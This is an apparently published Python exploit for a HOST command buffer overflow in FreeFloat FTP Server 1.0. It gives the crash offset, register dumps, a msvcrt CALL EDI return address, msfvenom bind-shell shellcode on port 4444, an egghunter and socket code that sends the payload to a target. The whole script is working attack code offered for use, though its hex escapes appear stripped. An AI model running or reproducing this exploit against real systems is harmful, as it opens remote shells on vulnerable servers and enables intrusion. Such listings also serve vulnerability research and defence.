FreeFloat FTP Server 1.0 HOST Buffer Overflow
Posted on 07 November 2017
#!/usr/bin/python # Exploit Title: FreeFloat FTP Server HOST Buffer Overflow (ASLR Bypass) # Date: 11/05/2017 # Exploit Author: 1N3@CrowdShield - https://crowdshield # Software Link: http://www.freefloat.com/software/freefloatftpserver.zip # Version: 1.00 # Tested on: Windows Vista SP2 Ultimate x86 (ASLR Enabled/DEP disabled) # CVE : N/A import socket, time # CONNECT TO HOST host = "10.0.0.39" port = 21 # [*] Exact match at offset 246 #buffer = "HOST " + "x41" * 246 + "x42" * 4 + "x43" * 745 + ' ' # AFTER CRASH #EAX 00000408 #ECX 001FC700 #EDX 77C45E74 ntdll.KiFastSystemCallRet #EBX 0000001A #ESP 01C7FC00 ASCII "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC #EBP 016D13F0 #ESI 0040A29E FTPServer.0040A29E #EDI 016D1D1F ASCII "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC #EIP 42424242 # !mona suggest # 0BADF00D [+] Examining registers # 0BADF00D EIP contains normal pattern : 0x41326941 (offset 246) # 0BADF00D ESP (0x01d4fc00) points at offset 258 in normal pattern (length 742) # 0BADF00D EDI (0x01741d24) points at offset 727 in normal pattern (length 273) # CALL EDI - msvcrt.dll #Found commands (All modules), item 5241 # Address=77D918F6 # Disassembly=CALL EDI # Module Name=C:Windowssystem32msvcrt.dll # BIND SHELL # msfvenom -p windows/shell_bind_tcp LPORT=4444 -f python -b "x0ax00x0d" # Payload size: 355 bytes + 4 byte egg = 359 bytes # Final size of python file: 1710 bytes bind_shell = "T00WT00W" bind_shell += "xddxc2xbfx9axa8x28x21xd9x74x24xf4x5dx33" bind_shell += "xc9xb1x53x31x7dx17x83xc5x04x03xe7xbbxca" bind_shell += "xd4xebx54x88x17x13xa5xedx9exf6x94x2dxc4" bind_shell += "x73x86x9dx8exd1x2bx55xc2xc1xb8x1bxcbxe6" bind_shell += "x09x91x2dxc9x8ax8ax0ex48x09xd1x42xaax30" bind_shell += "x1ax97xabx75x47x5axf9x2ex03xc9xedx5bx59" bind_shell += "xd2x86x10x4fx52x7bxe0x6ex73x2ax7ax29x53" bind_shell += "xcdxafx41xdaxd5xacx6cx94x6ex06x1ax27xa6" bind_shell += "x56xe3x84x87x56x16xd4xc0x51xc9xa3x38xa2" bind_shell += "x74xb4xffxd8xa2x31x1bx7ax20xe1xc7x7axe5" bind_shell += "x74x8cx71x42xf2xcax95x55xd7x61xa1xdexd6" bind_shell += "xa5x23xa4xfcx61x6fx7ex9cx30xd5xd1xa1x22" bind_shell += "xb6x8ex07x29x5bxdax35x70x34x2fx74x8axc4" bind_shell += "x27x0fxf9xf6xe8xbbx95xbax61x62x62xbcx5b" bind_shell += "xd2xfcx43x64x23xd5x87x30x73x4dx21x39x18" bind_shell += "x8dxcexecxb5x85x69x5fxa8x68xc9x0fx6cxc2" bind_shell += "xa2x45x63x3dxd2x65xa9x56x7bx98x52x49x20" bind_shell += "x15xb4x03xc8x73x6exbbx2axa0xa7x5cx54x82" bind_shell += "x9fxcax1dxc4x18xf5x9dxc2x0ex61x16x01x8b" bind_shell += "x90x29x0cxbbxc5xbexdax2axa4x5fxdax66x5e" bind_shell += "xc3x49xedx9ex8ax71xbaxc9xdbx44xb3x9fxf1" bind_shell += "xffx6dxbdx0bx99x56x05xd0x5ax58x84x95xe7" bind_shell += "x7ex96x63xe7x3axc2x3bxbex94xbcxfdx68x57" bind_shell += "x16x54xc6x31xfex21x24x82x78x2ex61x74x64" bind_shell += "x9fxdcxc1x9bx10x89xc5xe4x4cx29x29x3fxd5" bind_shell += "x59x60x1dx7cxf2x2dxf4x3cx9fxcdx23x02xa6" bind_shell += "x4dxc1xfbx5dx4dxa0xfex1axc9x59x73x32xbc" bind_shell += "x5dx20x33x95" # 32 BYTE EGGHUNTER egghunter = "x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8x54x30x30x57x8bxfaxafx75xeaxafx75xe7xffxe7" # CALL EDI - msvcrt.dll eip = "xF6x18xD9x77" buffer = "HOST " + "x41" * 246 + eip + "x90" * 10 + bind_shell + "x90" * 241 + egghunter + ' ' try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((host,port)) print sock.recv(1024) sock.settimeout(10) print "Sending buffer..." print str(buffer) sock.sendto(buffer, (host, port)) print "Sent!" except: print "socket connection failed!" time.sleep(1) print "Done!"
